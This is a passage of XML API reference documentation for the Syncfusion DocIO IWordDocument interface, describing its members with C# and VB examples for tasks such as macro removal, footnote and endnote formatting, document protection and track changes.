                Dim textSelections As TextSelection() = document.FindSingleLine("First paragraph Second paragraph", True, False)
                Dim paragraph As WParagraph = Nothing
                  For Each textSelection As TextSelection In textSelections
                      'Get the found text as single text range and set highlight color
                      Dim textRange As WTextRange = textSelection.GetAsOneRange()
                      textRange.CharacterFormat.HighlightColor = Color.YellowGreen
                      paragraph = textRange.OwnerParagraph
                  Next
                'Find the next occurrence of a particular text extended to several paragraphs in the document
                textSelections = document.FindNextSingleLine(paragraph, new Regex("First paragraph Second paragraph"))
                For Each textSelection As TextSelection In textSelections
                    'Get the found text as single text range and set italic formatting
                    Dim text As WTextRange = textSelection.GetAsOneRange()
                    text.CharacterFormat.Italic = True
                Next
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.ResetFindNext">
            <summary>
            Resets the <see cref="!:WordDocument.FindNext()"/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.CreateParagraphItem(Syncfusion.DocIO.DLS.ParagraphItemType)">
            <summary>
            Creates a new paragraph item instance.
            </summary>
            <param name="itemType">A <see cref="T:Syncfusion.DocIO.DLS.ParagraphItemType"/> represents the type of paragraph item to create.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> this method created.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWordDocument.RemoveMacros">
            <summary>
            Removes the macros in the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to remove macros from the Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the document with macros
                WordDocument document = new WordDocument("Sample.docm");
                //Check whether the document has macros and remove them
                if (document.HasMacros)
                    document.RemoveMacros();
                //Save the document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the document with macros
                Dim document As New WordDocument("Sample.docm")
                'Check whether the document has macros and remove them
                If document.HasMacros Then
                    document.RemoveMacros()
                End If
                'Save the document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.ChartToImageConverter">
            <summary>
            Gets or sets the <see cref="T:Syncfusion.OfficeChart.IOfficeChartToImageConverter"/> object for converting chart to image
            </summary>
            <remarks>
            <para>In Word to PDF conversion, to preserve the charts as images in the generated PDF document, this <see cref="P:Syncfusion.DocIO.DLS.IWordDocument.ChartToImageConverter"/> must be initialized. Otherwise the charts will not be exported to the converted PDF</para>
            <para>ChartToImageConverter is supported from .NET Framework 4.0 onwards.</para>
            </remarks>
            <example>
            <para>The following code example demonstrates how to initialize the <see cref="P:Syncfusion.DocIO.DLS.IWordDocument.ChartToImageConverter"/> to preserve the charts as images in the generated PDF document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument wordDocument = new WordDocument("Template.docx", FormatType.Docx);
                //Initialize ChartToImageConverter for converting charts during Word to pdf conversion
                wordDocument.ChartToImageConverter = new ChartToImageConverter();
                //Create an instance of DocToPDFConverter
                DocToPDFConverter converter = new DocToPDFConverter();
                //Convert Word document into PDF document
                PdfDocument pdfDocument = converter.ConvertToPDF(wordDocument);
                //Save the PDF file 
                pdfDocument.Save("WordtoPDF.pdf");
                //Close the instance of document objects
                pdfDocument.Close(true);
                wordDocument.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim wordDocument As New WordDocument("Template.docx", FormatType.Docx)
                'Initialize ChartToImageConverter for converting charts during Word to pdf conversion
                        ///     wordDocument.ChartToImageConverter = New ChartToImageConverter()
                'Create an instance of DocToPDFConverter
                Dim converter As New DocToPDFConverter()
                'Convert Word document into PDF document
                Dim pdfDocument As PdfDocument = converter.ConvertToPDF(wordDocument)
                'Save the PDF file 
                pdfDocument.Save("WordtoPDF.pdf")
                'Close the instance of document objects
                pdfDocument.Close(True)
                wordDocument.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.Footnotes">
            <summary>
            Gets or sets the footnote separators of the document.
            </summary>
            <value>The <seealso cref="T:Syncfusion.DocIO.DLS.Footnote"/> instance used to specify the footnote separator of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.Footnote"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.Endnotes">
            <summary>
            Gets or sets the endnote separators of the document.
            </summary>
            <value>The <seealso cref="T:Syncfusion.DocIO.DLS.Endnote"/> instance used to specify the endnote separator of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.Endnote"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.DefaultTabWidth">
            <summary>
            Gets or sets the default tab stop position value measured in points.
            </summary>
            <value>The width of the default tab.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.Tab"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.BuiltinDocumentProperties">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.BuiltinDocumentProperties"/> collection that represents all the built-in document properties for the specified document. Read-only.
            </summary>
            <seealso cref="P:Syncfusion.DocIO.DLS.IWordDocument.BuiltinDocumentProperties"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.SummaryDocumentProperties"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.AttachedTemplate">
             <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.Template"/> object that represents the attached template of the document. Read-only.
             </summary>
             <value>Attached template of the document</value>
             <seealso cref="T:Syncfusion.DocIO.DLS.Template"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.UpdateStylesOnOpen">
            <summary>
            Gets or sets a value indicating whether to automatically update styles of the document from the attached template each time the document is opened. Default value is <b>false</b>.
            </summary>
            <value><b>True</b> if the styles of the document are updated to from the attached template;otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.CustomDocumentProperties">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.CustomDocumentProperties"/> collection that represents all the custom document properties for the specified document. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.Sections">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.WSectionCollection"/> collection that represents all the sections in the document. Read-Only.
            </summary>
            <value> A <c>Sections</c> collection represents all the <see cref="T:Syncfusion.DocIO.DLS.WSection"/> in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
            <seealso cref="T:Syncfusion.DocIO.DLS.WSectionCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WSection"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.Styles">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.IStyleCollection"/> collection that represents all the styles in the document. Read-Only.
            </summary>
            <value>A <see cref="T:Syncfusion.DocIO.DLS.IStyleCollection"/> collection represents all the <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
            <seealso cref="T:Syncfusion.DocIO.DLS.IStyleCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.StyleCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.IStyle"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.Style"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.ListStyles">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.ListStyleCollection"/> collection that represents all the list styles in the document. Read-Only.
            </summary>
            <value>All the <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.ListStyleCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.ListStyle"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.Bookmarks">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/> collection that represents all the bookmarks in the document. Read-Only.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.Bookmark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.TextBoxes">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.TextBoxCollection"/> collection that represents all the textboxes in the document. Read-Only.
            </summary>
            <value>A <see cref="T:Syncfusion.DocIO.DLS.TextBoxCollection"/> collection represents all the <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> in this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextBoxCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WTextBox"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.Comments">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.CommentsCollection"/> collection that represents all the comments in the document. Read-Only.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.CommentsCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WComment"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.LastSection">
            <summary>
            Gets the last <see cref="T:Syncfusion.DocIO.DLS.WSection"/> of the document. Read-Only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WSection"/> represents the last section of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
            <example>
            <para>The following code example demonstrates how to retrieve the last section of the document</para>
            <code lang="C#">
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Template.docx");
                //Retrieve the last section of the document and add new paragraph
                document.LastSection.AddParagraph().AppendText("Adding new paragraph to the document");
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            </code>
            <code lang="VB">
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Retrieve the last section of the document and add new paragraph
                document.LastSection.AddParagraph().AppendText("Adding new paragraph to the document")
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.WSection"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.LastParagraph">
            <summary>
            Gets the last <see cref="T:Syncfusion.DocIO.DLS.WParagraph"/> of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraph"/> represents the last paragraph of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
            <example>
            <para>The following code example demonstrates how to retrieve the last paragraph of the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Template.docx");
                //Set the last paragraph back color as Blue
                document.LastParagraph.ParagraphFormat.BackColor = Color.Blue;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the last paragraph back color as Blue
                document.LastParagraph.ParagraphFormat.BackColor = Color.Blue
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.WParagraph"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.EndnoteNumberFormat">
            <summary>
            Gets or sets the numbering format for the endnotes in the document.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.FootEndNoteNumberFormat"/> for the endnotes in the Word document</value>
            <example>
            <para>The following code example demonstrates how to specify the endnote number format in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the endnote format
                document.EndnoteNumberFormat = FootEndNoteNumberFormat.Arabic;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the endnote format
                document.EndnoteNumberFormat = FootEndNoteNumberFormat.Arabic
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.FootnoteNumberFormat">
            <summary>
            Gets or sets the numbering format for the footnotes in the document.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.FootEndNoteNumberFormat"/> for the footnotes in the Word document</value>
            <example>
            <para>The following code example demonstrates how to specify the footnote number format in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the footnote number format
                document.FootnoteNumberFormat = FootEndNoteNumberFormat.UpperCaseRoman;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the footnote number format
                document.FootnoteNumberFormat = FootEndNoteNumberFormat.UpperCaseRoman
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.RestartIndexForEndnote">
            <summary>
            Gets or sets the restart index for the endnotes in the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to specify the endnote restart index number in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the endnote restart index number
                document.RestartIndexForEndnote = EndnoteRestartIndex.RestartForEachSection;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the endnote restart index number
                document.RestartIndexForEndnote = EndnoteRestartIndex.RestartForEachSection
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.EndnotePosition">
            <summary>
            Gets or sets endnotes position in the document.
            </summary>
            <value>The <see cref="P:Syncfusion.DocIO.DLS.IWordDocument.EndnotePosition"/> for the endnotes in the document</value>
            <example>
            <para>The following code example demonstrates how to specify the endnote position in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the endnote position at end of each section
                document.EndnotePosition = EndnotePosition.DisplayEndOfSection;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the endnote position at end of each section
                document.EndnotePosition = EndnotePosition.DisplayEndOfSection
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.RestartIndexForFootnotes">
            <summary>
            Gets or sets the restart index for the footnotes in the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to specify the footnote restart index number in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the footnote restart index number
                document.RestartIndexForFootnotes = FootnoteRestartIndex.RestartForEachPage;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the footnote restart index number
                document.RestartIndexForFootnotes = FootnoteRestartIndex.RestartForEachPage
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.FootnotePosition">
            <summary>
            Gets or sets footnotes position in the document.
            </summary>
            <value>The <see cref="P:Syncfusion.DocIO.DLS.IWordDocument.FootnotePosition"/> for the footnote in the document</value>
            <example>
            <para>The following code example demonstrates how to specify the footnote position in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance  
                WordDocument document = new WordDocument("Template.docx");
                //Set the footnote position at immediately beneath text
                document.FootnotePosition = FootnotePosition.PrintImmediatelyBeneathText;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the footnote position at immediately beneath text
                document.FootnotePosition = FootnotePosition.PrintImmediatelyBeneathText
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.Watermark">
            <summary>
            Gets or sets a watermark for the document.
            </summary>
            <value>A text/picture that appears behind the document</value>
            <seealso cref="P:Syncfusion.DocIO.DLS.IWordDocument.Watermark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextWatermark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.PictureWatermark"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.Background">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Background"/> object that represents the background effects of the document. Read-only.
            </summary>
            <value>The background effects of the document</value>
            <seealso cref="P:Syncfusion.DocIO.DLS.IWordDocument.Background"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.MailMerge">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.MailMerge"/> object that represents the mail merge functionality of the document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.MailMerge"/> instance used to replace the <see cref="T:Syncfusion.DocIO.DLS.WMergeField"/> with value in the document</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.MailMerge"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WMergeField"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.ProtectionType">
            <summary>
            Gets or sets the document protection type.
            </summary>
            <value> The <see cref="P:Syncfusion.DocIO.DLS.IWordDocument.ProtectionType"/> will prevent the document from unintentional editing.</value>
            <example>
            <para>The following code example demonstrates how to protect the changing of document content.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Template.docx");
                //protect the document from editing
                document.ProtectionType = Syncfusion.DocIO.ProtectionType.AllowOnlyReading;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'protect the document from editing
                document.ProtectionType = Syncfusion.DocIO.ProtectionType.AllowOnlyReading
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.ViewSetup">
            <summary>
            Gets or sets the document view type.
            </summary>
            <value>A <see cref="P:Syncfusion.DocIO.DLS.IWordDocument.ViewSetup"/> represents the display options of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> in MS Word application</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.ThrowExceptionsForUnsupportedElements">
            <summary>
            Gets or sets a value indicating whether to throw exceptions for unsupported elements. The default is <b>false</b>.
            </summary>
            <value><b>True</b> then throw the exception for unsupported elements; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.InitialFootnoteNumber">
            <summary>
            Gets or sets the initial footnote number of the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to specify the endnote number format in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the footnote initial number
                document.InitialFootnoteNumber = 3;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the footnote initial number
                document.InitialFootnoteNumber = 3
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.InitialEndnoteNumber">
            <summary>
            Gets or sets the initial endnote number of the document.
            </summary>
            <example>
            <para>The following code example demonstrates how to specify the endnote initial number in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Set the endnote initial number
                document.InitialEndnoteNumber = 5;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Set the endnote initial number
                document.InitialEndnoteNumber = 5
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.ChildEntities">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.EntityCollection"/> collection that represents the child entities of this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>. Read-only.
            </summary>
            <value>The child entities.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.XHTMLValidateOption">
            <summary>
            Gets or sets the HTML validate option.
            </summary>
            <remarks>
            This property is not supported in Silverlight, Universal, Windows Phone, MVC6 and Xamarin application.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.BackgroundImage">
            <summary>
            Gets or sets the background image of a document.
            </summary>
            <seealso cref="P:Syncfusion.DocIO.DLS.IWordDocument.Background"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.Variables">
            <summary>
            Gets a <see cref="T:Syncfusion.DocIO.DLS.DocVariables"/> collection that represents the variables stored in the document. Read-only.
            </summary>
            <value>
            Variables collection contains a Key-Value pair of variable name and its value
            </value>
            <example>
            <para>The following code snippet illustrate how to add a DocVariable field in Word document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("First Name of the customer: ");
                //Add the DocVariable field with Variable name and its type
                paragraph.AppendField("FirstName", FieldType.FieldDocVariable);
                paragraph = section.AddParagraph();
                paragraph.AppendText("Last Name of the customer: ");
                //Add the DocVariable field with Variable name and its type
                paragraph.AppendField("LastName", FieldType.FieldDocVariable);
                //Add the value for variable in WordDocument.Variable collection
                document.Variables.Add("FirstName", "Jeff");
                document.Variables.Add("LastName", "Smith");
                //Update the document fields
                document.UpdateDocumentFields();
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("First Name of the customer: ")
                'Add the DocVariable field with Variable name and its type
                paragraph.AppendField("FirstName", FieldType.FieldDocVariable)
                paragraph = section.AddParagraph()
                paragraph.AppendText("Last Name of the customer: ")
                'Add the DocVariable field with Variable name and its type
                paragraph.AppendField("LastName", FieldType.FieldDocVariable)
                'Add the value for variable in WordDocument.Variable collection
                document.Variables.Add("FirstName", "Jeff")
                document.Variables.Add("LastName", "Smith")
                'Update the document fields
                document.UpdateDocumentFields()
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.Properties">
            <summary>
            Gets the document properties. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.DocProperties"/> instance used to specify the document version, form field shading and hyphenation properties of the document</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.HasChanges">
            <summary>
            Gets a value indicating whether the document has tracked changes. Read-only.
            </summary>
            <value>
            <b>True</b> if the document has tracked changes; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.TrackChanges">
            <summary>
            Gets or sets a value indicating whether edits are tracked as revision. The default is <b>false</b>.
            </summary>
            <value><b>True</b> if track changes in on; otherwise, <b>false</b>.</value>
            <example>
            <para>The following code snippet shows how to track the edits as revisions in the document</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance 
                WordDocument document = new WordDocument("Template.docx");
                //Enable the TrackChanges to track the edits as revision  
                document.TrackChanges = true;
                //Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance 
                Dim document As New WordDocument("Template.docx")
                'Enable the TrackChanges to track the edits as revision  
                document.TrackChanges = True
                'Save and Close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.ReplaceFirst">
            <summary>
            Gets or sets a value indicating whether replace only the first occurrence. The default is <b>false</b>.
            </summary>
            <value><b>True</b> replace only the first occurrence in the document; <b>false</b> replace all the occurrence.</value>
            <example>
            <para>The following code snippet illustrates how to replace the first occurrence of a particular text.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Set to replace only the first occurrence of a particular text
                document.ReplaceFirst = true;
                //Find the first occurrence of a particular text in the document
                TextSelection selection = document.Find("contents", false, false);
                //Initialize text body part
                TextBodyPart bodyPart = new TextBodyPart(selection);
                //Replace a particular text with the text body part
                document.Replace("paragraph", bodyPart, false, true, true);
                //Save and close the document
                document.Save("Replace.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Set to replace only the first occurrence of a particular text
                document.ReplaceFirst = True
                'Find the first occurrence of a particular text in the document
                Dim selection As TextSelection = document.Find("contents", False, False)
                'Initialize text body part
                Dim bodyPart As New TextBodyPart(selection)
                'Replace a particular text with the text body part
                document.Replace("paragraph", bodyPart, False, True, True)
                'Save and close the document
                document.Save("Replace.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.HTMLImportSettings">
            <summary>
            Gets or sets the HTML import settings for HTML to Word conversion.
            </summary>
            <remarks>This property is not supported in Xamarin platforms.</remarks>
            <seealso cref="P:Syncfusion.DocIO.DLS.IWordDocument.HTMLImportSettings"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.SaveOptions">
            <summary>
            Gets the document save options. Read-only.
            </summary>
            <value>A <see cref="P:Syncfusion.DocIO.DLS.IWordDocument.SaveOptions"/> that represents the save options for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/></value>
            <seealso cref="T:Syncfusion.DocIO.DLS.SaveOptions"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.UpdateFields">
            <summary>
            Gets or sets a value indicating whether to update fields in the document.
            </summary>
            <value>if update fields, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWordDocument.ActualFormatType">
            <summary>
            Gets the actual format type of the document which was loaded. While creating new document, it returns FormatType.Doc value. Read-only.
            </summary>
